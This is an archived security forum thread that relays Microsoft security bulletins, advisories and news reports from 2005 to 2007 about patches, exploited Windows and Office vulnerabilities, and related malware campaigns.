PDA

View Full Version : Old MS Alerts



Pages : [1] 2 3

AplusWebMaster
2005-11-25, 19:47
FYI...good reason to be "selective" when doing "Windows Updates"...

- http://support.microsoft.com/?kbid=890830
Last Review: November 24, 2005
Revision: 15.2
"...Known issues in the November 8, 2005 release
When you run the November 8, 2005 release of the Windows Malicious Software Removal Tool from Windows Update, from Automatic Update, or from the Download Center, the tool may appear to stop responding. Additionally, you may experience one of the following symptoms:
• When you run the tool from Windows Update or from Automatic Update, Windows Task Manager shows that the Iexplore.exe process has high CPU usage.
• When you run the tool from the Download Center, Windows Task Manager shows that the Mrt.exe process has high CPU usage.
To resolve this issue, install the updated version of the Windows Malicious Software Removal Tool that is now available from Windows Update, from Microsoft Update, from Automatic Updates, or from the Download Center. An updated version of the Windows Malicious Software Removal Tool was released on November 11, 2005.
>>> http://tinyurl.com/83c52

:(

AplusWebMaster
2007-07-05, 23:20
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx
Published: July 5, 2007
...This is an advance notification of -six- security bulletins that Microsoft is intending to release on July 10, 2007...

Critical (3)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Office, Excel...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution ...
Affected Software: .NET Framework...


Important (2)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Office, Publisher...

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution ...
Affected Software: Windows XP Professional...


Moderate (1)

Microsoft Security Bulletin 3
Maximum Severity Rating: Moderate
Impact of Vulnerability: Information Disclosure ...
Affected Software: Windows Vista..."


.

AplusWebMaster
2007-08-09, 21:19
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-aug.mspx
Published: August 9, 2007
"...This is an advance notification of -nine- security bulletins that Microsoft is intending to release on August 14, 2007...

Critical (6)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, XML Core Services...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Visual Basic, Office for Mac...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...

Microsoft Security Bulletin 4
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin 5
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 9
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...


Important (3)

Microsoft Security Bulletin 6
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows Vista...

Microsoft Security Bulletin 8
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Virtual PC, Virtual Server...


.

AplusWebMaster
2007-09-06, 23:12
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-sep.mspx
Published: September 6, 2007

"This is an advance notification of five security bulletins that Microsoft is intending to release on September 11, 2007...

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows.

Important (4)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Visual Studio.

Microsoft Security Bulletin 3
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows Services for UNIX, Subsystem for UNIX-based Applications.

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: MSN Messenger, Windows Live Messenger.

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, SharePoint Server.
-----------------------------------------------

- http://www.microsoft.com/technet/security/bulletin/ms07-sep.mspx
Revisions:
• September 7, 2007: Bulletin Advance Notification updated. Microsoft plans to release four security bulletins, and no longer plans to release Microsoft Security Bulletin 5 affecting Windows and SharePoint Server, on Tuesday, September 11, 2007.

.

AplusWebMaster
2007-10-05, 13:29
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
October 4, 2007
"...This bulletin advance notification will be replaced with the October bulletin summary on October 9, 2007...

Critical (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin 3
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Office...


Important (3)

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...

Microsoft Security Bulletin 7
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows, Office..."


.

AplusWebMaster
2007-10-10, 01:38
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
Published: October 9, 2007
"This bulletin summary lists security bulletins released for October 2007...


Critical (4)

Microsoft Security Bulletin MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution (923810)
- http://www.microsoft.com/technet/security/bulletin/ms07-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows...

Microsoft Security Bulletin MS07-056
Security Update for Outlook Express and Windows Mail (941202)
- http://www.microsoft.com/technet/security/bulletin/ms07-056.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS07-057
Cumulative Security Update for Internet Explorer (939653)
- http://www.microsoft.com/technet/security/bulletin/ms07-057.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Windows, Internet Explorer...

Microsoft Security Bulletin MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution (942695)
- http://www.microsoft.com/technet/security/bulletin/ms07-060.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Affected Software: Office...


Important (2)

Microsoft Security Bulletin MS07-058
Vulnerability in RPC Could Allow Denial of Service (933729)
- http://www.microsoft.com/technet/security/bulletin/ms07-058.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Denial of Service
Affected Software: Windows...

Microsoft Security Bulletin MS07-059
Vulnerability in Windows SharePoint Services 3.0 and Office SharePoint Server 2007 Could Result in Elevation of Privilege Within the SharePoint Site (942017)
- http://www.microsoft.com/technet/security/bulletin/ms07-059.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege
Affected Software: Windows, Office...

------------------------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3480

==========================================

- http://blogs.technet.com/msrc/archive/2007/10/09/october-2007-monthly-release.aspx
"...Microsoft also re-released bulletin MS05-004*. This re-release updates detection includes Server 2003 Service Pack 2 and Vista as affected platforms. There were no changes to the update binaries, so if you have already successfully installed this update, you do not need to reinstall it..."

Microsoft Security Bulletin MS05-004
ASP.NET Path Validation Vulnerability (887219)
* http://www.microsoft.com/technet/security/Bulletin/MS05-004.mspx
Revisions:
• V1.0 (February 8, 2005): Bulletin published
• V1.1 (February 15, 2005): Bulletin updated to include Knowledge Base Article numbers for each individual download under Affected Products.
• V1.2 (March 16, 2005): Bulletin “Caveats” section has been updated to document known issues that customers may experience when installing the available security updates.
• V2.0 (June 14, 2005): Bulletin updated to announce the availability of an updated package for .NET Framework 1.0 Service Pack 3 for the following operating system versions: (887998) Windows XP Tablet PC Edition and Windows XP Media Center Edition.
• V3.0 (August 8, 2006): Bulletin updated to reflect the addition of Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 x64 Edition for .NET Framework 1.1 Service Pack 1 under “Affected Software” for “Microsoft .NET Framework 1.1”.
• V4.0 (October 9, 2007): Bulletin updated as Windows Server 2003 Service Pack 2 and Windows Vista have been added to the “Affected Software” sections for .NET Framework 1.0 Service Pack 3 KB886906 and .NET Framework 1.1 Service Pack 1 KB886903.

.

AplusWebMaster
2007-10-12, 01:31
FYI...

Microsoft Security Advisory (943521)
URL Handling Vulnerability in Windows XP and Windows Server 2003 with Windows Internet Explorer 7 Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/943521.mspx
Published: October 10, 2007
"Microsoft is investigating public reports of a remote code execution vulnerability in supported editions of Windows XP and Windows Server 2003 with Windows Internet Explorer 7 installed. We are not aware of attacks that try to use the reported vulnerability or of customer impact at this time. Microsoft is investigating the public reports.
• This vulnerability does not affect Windows Vista or any supported editions of Windows where Internet Explorer 7 is not installed..."

MSRC blog
> http://preview.tinyurl.com/yoadp8
October 10, 2007
--------------------

> http://www.microsoft.com/technet/security/advisory/943521.mspx
Updated: November 13, 2007 - "...We have issued MS07-061* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/MS07-061.mspx

.

AplusWebMaster
2007-10-12, 01:32
FYI...

- http://preview.tinyurl.com/2q4xop
October 11, 2007 (Computerworld) - Security researchers spotted an attack yesterday that exploits a vulnerability in Microsoft Word patched just the day before. On Wednesday, Symantec Corp. reported it had obtained a suspicious Word document that crashed every version of the application except the newest, Word 2007, when opened. After it examined the document, Symantec found that the document included shell code and three pieces of malware. Among its more surprising findings: Symantec found that the document had been created with the edition of Word included with Office for Mac 2004. On Tuesday, Microsoft Corp. issued a patch that closed a critical vulnerability in multiple editions of the popular word processor, including Word 2000, Word XP and Word for the Mac. Symantec put the two together. "Taking a closer look at that vulnerability, we confirmed that this document was in fact exploiting the same vulnerability"... Updates to the Windows versions of Word can be obtained via Microsoft Update or Office Update..."

- http://preview.tinyurl.com/2saysc
October 10, 2007 (Symantec Security Response Weblog)

> http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3899

> http://cwe.mitre.org/data/definitions/94.html

:fear:

AplusWebMaster
2007-10-26, 15:36
FYI...

- http://preview.tinyurl.com/27znt2
October 16, 2007 (Computerworld) - "For the second time in a month, Microsoft Corp. has had to defend Windows Update against charges that it upgraded machines without users' permission. So far, it has no explanation for the newest instance of unauthorized updating..."

- https://windowssecrets.com/2007/10/25/03-PC-rebooting-The-cause-may-be-MS-OneCare
October 25, 2007 - "...My finding is that Windows Live OneCare silently changes the AU settings. This explains at least some of the complaints that have been reported so far. Users could have installed OneCare — even a free-trial version — at any time in the recent past and been unaware of any changes until Automatic Updates forced a reboot in the wee hours..."

- http://support.microsoft.com/kb/943144/en-us
Last Review: October 26, 2007
Revision: 2.2

AplusWebMaster
2007-10-26, 15:48
FYI...

URL Update to IE URL Handling Vuln
- http://isc.sans.org/diary.php?storyid=3547
Last Updated: 2007-10-26 02:05:06 UTC - "Earlier this month, Microsoft published KB943521. This article acknowledged that third party software had to validate URLs before passing them to Internet Explorer, as Internet Explorer will not validate them. Today, Microsoft published an update to the advisory, suggesting limited exploitation of this vulnerability.
Microsoft does not appear to plan to fix the issue in Internet Explorer. Instead, it asks vendors releasing tools that pass URLs to Internet Explorer to validate them...

Links:

http://www.microsoft.com/technet/security/advisory/943521.mspx
Revisions:
• October 10, 2007: Advisory published
• October 25, 2007: Advisory updated to reflect increased threat level

http://blogs.technet.com/msrc/archive/2007/10/25/msrc-blog-october-25th-update-to-security-advisory-943521.aspx "

.

AplusWebMaster
2007-10-29, 23:40
FYI...

- http://preview.tinyurl.com/ysz6so
October 29, 2007 - (Infoworld) "A hacker has released attack code that could be used to exploit a critical bug in some versions of the Windows operating system. Microsoft patched the flaw, which affects older versions of Windows, on Oct. 9. When the Image Viewer tries to open a maliciously encoded TIFF file, it can be tricked into running unauthorized software on the PC. A sample of the exploit was posted Monday to the Milw0rm Web site. The code has not yet been used in online attacks, according to Symantec, which issued an alert Monday. Symantec recommends that Windows users install the MS07-055 update* as quickly as possible. Microsoft took the unusual step of issuing its own security update for Kodak's software, because the image viewer (formerly known as the Wang Image Viewer) had shipped in Windows 2000 systems by default. Still, many Windows users are not affected by the problem. Windows XP and Windows Server 2003 users should not have the software installed on their PCs, unless they downloaded it directly or upgraded from Windows 2000. Windows Vista users are not affected by the bug. Also, users would have to open the TIFF file using the Kodak Image Viewer for the attack to work..."

* http://forums.spybot.info/showpost.php?p=125886&postcount=17

:fear:

AplusWebMaster
2007-11-06, 15:06
FYI...

Microsoft Security Advisory (944653)
Vulnerability in Macrovision SECDRV.SYS Driver on Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/944653.mspx
November 5, 2007 - "Microsoft is working with Macrovision, investigating new public reports of a vulnerability in the Macrovision secdrv.sys driver on supported editions of Windows Server 2003 and Windows XP. This vulnerability does not affect Windows Vista. We are aware of limited attacks that try to use the reported vulnerability. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This will include providing a security update through our monthly release process..."

> http://www.macrovision.com/promolanding/7352.htm

- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5587

:fear:

FYI...

Follow-up on Macrovision Secdrv exploit
- http://www.symantec.com/enterprise/security_response/weblog/2007/11/followup_on_macrovision_secdrv.html
November 6, 2007 - "...Microsoft posted Microsoft Security Advisory (944653) about this issue. With the release of this advisory, I’d like to answer a few follow-up questions for blog readers:
Q: I don’t play games and I don’t use Macrovision software, so am I safe?
A: No. The vulnerable component affected by the bug is the Macrovision driver SECDRV.SYS, which is shipped by default with Windows systems. It is usually installed under the %System%\drivers folder.
Q: Is Windows Vista affected by this vulnerability?
A: Vista is not affected. Only SECDRV versions shipped with Windows XP and 2003 are. Instead the version shipped with Vista is a completely different driver, reworked and not vulnerable to this attack.All users should keep in mind that, in a multi-layered defense perspective, it is possible that malware dropped on the system via some other exploit (e.g. browser vulnerability or the recent PDF exploit) could potentially take advantage of the SECDRV bug to take further control of the computer and bypass other layers of protection.
Q: Where is the patch?
A: Macrovision released a version of the driver today (almost identical to the one shipped with Vista) that fixes this problem. The update is available here:
http://www.macrovision.com/promolanding/7352.htm
It’s not clear at the moment if Microsoft will distribute this update with the next cycle of Windows Update."

- http://www.microsoft.com/technet/security/advisory/944653.mspx
Revisions:
• November 05, 2007: Advisory published
• November 07, 2007: Advisory revised to include indentified workarounds for this vulnerability and additional information on what is secdrv.sys.

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-nov.mspx
November 13, 2007
"...The security bulletins for this month are as follows, in order of severity:

Critical (1)

Microsoft Security Bulletin MS07-061
Vulnerability in Windows URI Handling Could Allow Remote Code Execution (943460)
- http://www.microsoft.com/technet/security/bulletin/MS07-061.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin MS07-062
Vulnerability in DNS Could Allow Spoofing (941672)
- http://www.microsoft.com/technet/security/bulletin/MS07-062.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...
------------------------------------

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3642
Last Updated: 2007-11-13 18:47:44 UTC

.

FYI...

- http://www.eweek.com/article2/0,1759,2218894,00.asp?kc=EWRSS03119TX1K0000594
November 18, 2007 - "An MSN Messenger Trojan is growing a botnet by hundreds of infected PCs per hour, adding VMs to the mix as well... The malware is being introduced by MSN Messenger files posing as pictures, mostly seeming to come from known acquaintances. The files are a new type of Trojan that has snared several thousand PCs for a bot network within hours of its launch earlier on Nov. 18 and is being used to discover virtual PCs as a means of increasing its growth vector. The eSafe CSRT (Content Security Response Team) at Aladdin — a security company — detected the new threat propagating around noon EST on Nov. 18. At 18:00 UTC (Coordinated Universal Time), eSafe had detected 1 operator and more than 500 on-command bots in the network. Less than three hours later, or by 2:30 EST, when eWEEK spoke with Roei Lichtman, eSafe director of product management, the number had soared to several thousand PCs and was growing by several hundred systems per hour. eSafe is monitoring the IRC channel used to control the botnet. The only inhabitants of the network besides the operator are in fact infected PCs. The Trojan is an IRC bot that's spreading through MSN Messenger by sending itself in a .zip file with two names. One of the names includes the word "pics" as a double extension executable — a name generally used by scanners and digital cameras: for example, DSC00432.jpg.exe. The Trojan is also contained in a .zip file with the name "images" as a .pif executable—for example, IMG34814.pif... Given the familiar social engineering aspect of the attack, individuals are being urged to not open files sent unexpectedly from either friends or strangers..."

- http://www.us-cert.gov/current/#msn_messenger_trojan
November 19, 2007 - "...The Trojan arrives as a chat message that appears to contain an image file, that when opened, downloads and installs a Internet Relay Chat Bot. These messages may appear to come from a known contact..."

:fear:

FYI...

- http://preview.tinyurl.com/2sezx7
November 21, 2007 (Computerworld) - "Windows XP, Microsoft Corp.'s most popular operating system, sports the same encryption flaws that Israeli researchers recently disclosed in Windows 2000, Microsoft officials confirmed late Tuesday... As recently as last Friday, Microsoft hedged in answering questions about whether XP and Vista could be attacked in the same way, saying only that later versions of Windows "contain various changes and enhancements to the random number generator." Yesterday, however, Microsoft responded to further questions and acknowledged that Windows XP is vulnerable to the complex attack that Pinkas, Gutterman and Dorrendorf laid out in their paper, which was published earlier this month. Windows Vista, Windows Server 2003 and the not-yet-released Windows Server 2008, however, apparently use a modified or different random number generator; Microsoft said they were immune to the attack strategy. In addition, Microsoft said Windows XP Service Pack 3 (SP3), a major update expected sometime in the first half of 2008, includes fixes that address the random number generator problem... Because the company has determined that the PRNG problem is not a security vulnerability, it is unlikely to provide a patch."

:fear:

FYI...

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
December 3, 2007 - "Microsoft is investigating new public reports of a vulnerability in the way Windows resolves hostnames that do not include a fully-qualified domain name (FQDN). The technology that the vulnerability affects is Web Proxy Auto-Discovery (WPAD). Microsoft has not received any information to indicate that this vulnerability has been publicly used to attack customers, and Microsoft is not aware of any customer impact at this time. Microsoft is aggressively investigating the public reports. Customers whose domain name begins in a third-level or deeper domain, such as “contoso.co.us”, or for whom the following mitigating factors do not apply, are at risk from this vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers...
Mitigating Factors:
• Customers who do not have a primary DNS suffix configured on their system are not affected by this vulnerability. In most cases, home users that are not members of a domain have no primary DNS suffix configured. Connection-specific DNS suffixes may be provided by some Internet Service Providers (ISPs), and these configurations are not affected by this vulnerability.
• Customers whose DNS domain name is registered as a second-level domain (SLD) below a top-level domain (TLD) are not affected by this vulnerability. Customers whose DNS suffixes reflect this registration would not be affected by this vulnerability. An example of a customer who is not affected is contoso.com or fabrikam.gov, where “contoso” and “fabrikam” are customer registered SLDs under their respective “.com” and “.gov” TLDs.
• Customers who have specified a proxy server via DHCP server settings or DNS are not affected by this vulnerability.
• Customers who have a trusted WPAD server in their organization are not affected by this vulnerability. (See the Workaround section for specific steps in creating a WPAD.DAT file on a WPAD server.)
• Customers who have manually specified a proxy server in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.
• Customers who have disabled 'Automatically Detect Settings' in Internet Explorer are not at risk from this vulnerability when using Internet Explorer..."

- http://secunia.com/advisories/27901/
"...WPAD feature resolves "wpad" hostnames up to the second-level domain, which is potentially untrusted. This can be exploited to conduct man-in-the-middle attacks against third-level or deeper domains..."

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-dec.mspx
Published: December 11, 2007
Version: 1.0
"This bulletin summary lists security bulletins released for December 2007..."

Critical (3)

Microsoft Security Bulletin MS07-064
Vulnerabilities in DirectX Could Allow Remote Code Execution (941568)
- http://www.microsoft.com/technet/security/bulletin/MS07-064.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, DirectX, DirectShow...

Microsoft Security Bulletin MS07-068
Vulnerability in Windows Media File Format Could Allow Remote Code Execution (941569 and 944275)
- http://www.microsoft.com/technet/security/bulletin/MS07-068.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Windows Media Format Runtime...

Microsoft Security Bulletin MS07-069
Cumulative Security Update for Internet Explorer (942615)
- http://www.microsoft.com/technet/security/bulletin/MS07-069.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...


Important (4)

Microsoft Security Bulletin MS07-063
Vulnerability in SMBv2 Could Allow Remote Code Execution (942624)
- http://www.microsoft.com/technet/security/bulletin/MS07-063.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS07-065
Vulnerability in Message Queuing Could Allow Remote Code Execution (937894)
- http://www.microsoft.com/technet/security/bulletin/MS07-065.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin MS07-066
Vulnerability in Windows Kernel Could Allow Elevation of Privilege (943078)
- http://www.microsoft.com/technet/security/bulletin/MS07-066.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows...

Microsoft Security Bulletin MS07-067
Vulnerability in Macrovision Driver Could Allow Local Elevation of Privilege (944653)
- http://www.microsoft.com/technet/security/bulletin/MS07-067.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows..."

===================================

ISC Analysis
- http://isc.sans.org/diary.html?storyid=3735
Last Updated: 2007-12-11 19:14:09 UTC

===================================

- http://blog.washingtonpost.com/securityfix/2007/12/microsoft_plugs_11_windows_sec.html
December 11, 2007 - "...December's seven update bundles includes fixes for four separate security holes in Internet Explorer 6 and IE7, vulnerabilities that are considered critical for Windows 2000, Windows XP and Windows Vista users. Microsoft rates a flaw "critical" if it can be exploited to break into vulnerable systems with little or no help from the user, save perhaps for browsing a Web site or by clicking on a malicious link in an e-mail or instant message. The IE patch is probably the most important update Redmond issued this month, as the vulnerabilities it corrects have the potential to affect the largest number of people. Microsoft said that criminals already exploited one of the IE flaws to remotely compromise IE users. Microsoft also issued critical updates to fix at least two different problems with the way Windows handles the processing and display of various video and audio files..."

:santa:

AplusWebMaster
2007-11-08, 22:10
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-nov.mspx
Published: November 8, 2007
"This is an advance notification of two security bulletins that Microsoft is intending to release on November 13, 2007...

Critical (1)

Microsoft Security Bulletin 1
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Important (1)

Microsoft Security Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Windows...

Other Information:

Microsoft Windows Malicious Software Removal Tool
- Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release three non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release zero non-security, high-priority updates for Windows on Windows Update (WU).

Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2007-11-15, 18:27
FYI...

- http://www.us-cert.gov/current/#false_microsoft_update_emails_circulating
November 15, 2007 - " US-CERT is aware of false Microsoft Update email messages being publicly circulated. These messages contain multiple links that may direct a user to a malicious web site. The impact of following these links is currently unknown, more information will be provided as it becomes available. US-CERT encourages users to take the following measures to protect themselves:
> Do not follow unsolicited web links in email messages
> Follow the Microsoft guidelines* for recognizing fraudulent email messages ..."
* http://www.microsoft.com/protect/yourself/phishing/msemail.mspx

- http://atlas.arbor.net/briefs/index#-1494625952
Microsoft MS07-055 Trojan Emails
Severity: Elevated Severity
"...The message states that users should install the Kodak Image Viewer patch for advisory MS07-055. The user is directed to a website not owned by Microsoft and told to download a patch. The binary includes the real MS07-055 Windows XP patch, together with a Bandok Trojan. We are working with vendors and security companies to address this issue.
Analysis: This is a potentially serious problem due to the fact that the original Trojan binary is not recognized by any AV tools. Once unpacked, however, the Bandok Trojan is properly recognized by many AV tools. We are working on site takedown."

:fear:

AplusWebMaster
2007-12-05, 16:54
FYI...

A blank Web page is displayed when you start Internet Explorer 7
- http://support.microsoft.com/default.aspx/kb/945385
Last Review: December 4, 2007
Revision: 1.0

Internet Explorer stops responding, stops working, or restarts
Self-help steps for a beginning to an intermediate computer user
- http://support.microsoft.com/gp/pc_ie_intro


(Found at Sandi Hardmeier's "Spyware Sucks" site - thanks Sandi!)
> http://msmvps.com/blogs/spywaresucks/

:cool:

AplusWebMaster
2007-12-06, 20:49
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms07-dec.mspx
Published: December 6, 2007
"...This is an advance notification of -seven- security bulletins that Microsoft is intending to release on December 11, 2007...

Critical (3)

Microsoft Security Bulletin 2
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, DirectX, DirectShow...

Microsoft Security Bulletin 6
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Windows Media Format Runtime...

Microsoft Security Bulletin 7
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows, Internet Explorer...

Important (4)

Microsoft Security Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 3
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Windows...

Microsoft Security Bulletin 4
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Windows...

Microsoft Security Bulletin 5
Maximum Severity Rating: Important
Impact of Vulnerability: Local Elevation of Privilege...
Affected Software: Windows...
---

Microsoft Windows Malicious Software Removal Tool
Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Non-Security, High-Priority Updates on MU, WU, and WSUS
For this month:
• Microsoft is planning to release -six- non-security, high-priority updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
• Microsoft is planning to release -one- non-security, high-priority update for Windows on Windows Update (WU).
Note that this information pertains only to non-security, high-priority updates on Microsoft Update, Windows Update, and Windows Server Update Services released on the same day as the security bulletin summary. Information is not provided about non-security updates released on other days..."

AplusWebMaster
2007-12-12, 14:23
FYI...

- http://preview.tinyurl.com/2rtbmz
December 11, 2007 (Symantec Security Response Weblog) - "...Microsoft released seven bulletins this month, covering a total of eleven vulnerabilities. Nine of the vulnerabilities affect Microsoft Vista either directly or through applications running on that operating system..."

> http://forums.spybot.info/showpost.php?p=144071&postcount=31

:fear:

AplusWebMaster
2007-12-12, 14:52
FYI...

- http://www.microsoft.com/presspass/features/2007/dec07/12-11Office2007SP1.mspx
Dec 11, 2007 - "...Customers can download SP1 immediately from http://office.microsoft.com/en-us/downloads/default.aspx . They can also place an order for a CD at http://office.microsoft.com/en-us/default.aspx . At a later date, we also will provide SP1 through automatic update..."
=====================================

Office 2007 SP1 auto-installs confuse Vista, XP users
- http://preview.tinyurl.com/2aysx4
December 13, 2007 (Infoworld) - "Some users have gotten the massive Office 2007 SP1 update automatically, even though Microsoft said it would not use Windows' AU (Automatic Updates) to push out the large upgrade for several months, the company confirmed Thursday. Anyone running a preview copy of Windows Vista Service Pack 1 (SP1), which was made available to all comers only Wednesday, will receive the Office 2007 upgrade automatically. Users of other in-beta Microsoft products, including Windows XP SP3, which is still in limited testing, will also be hit by the Office update, which weighs in at almost 220MB. "As noted to beta customers, if [they] are running Vista SP1 beta software, as part of the beta program, Office 2007 SP1 on pre-release Windows Vista SP1 will automatically install as planned for this beta program," said Bobbie Harder, a senior program manager with the WSUS (Windows Server Update Services) group... even if users of Vista SP1, Windows XP SP3, or WSUS 3.0 SP3 manually installed Office 2007 SP1, AU later automatically installs -- actually re-installs -- the service pack... The next time Windows Update runs, however, Office 2007 SP1 reappears, again checked by default. To strike it off the list, users must right-click the item in the list and choose "hide update."

:fear:

AplusWebMaster
2007-12-12, 15:01
FYI...

Microsoft Security Advisory (944653)
Vulnerability in Macrovision SECDRV.SYS Driver on Windows Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/944653.mspx
Updated: December 11, 2007 - "...We have issued MS07-067* to address this issue..."

* http://www.microsoft.com/technet/security/Bulletin/MS07-067.mspx

:fear:

AplusWebMaster
2007-12-12, 15:41
FYI... (Windows Genuine Annoyance)

- http://support.microsoft.com/kb/892130/en-us
Last Review: December 5, 2007
Revision: 3.8
"...you may be prompted to complete the Windows Genuine Advantage (WGA) validation check process. On the Download Center Web site, you may be prompted to install an ActiveX control when you select a download that is marked with the WGA icon. On the Windows Update Web site, the ActiveX control is a mandatory update..."

.

AplusWebMaster
2007-12-19, 14:47
FYI...

MS07-069 (IE update)... Post Install Issue
- http://preview.tinyurl.com/252f8d
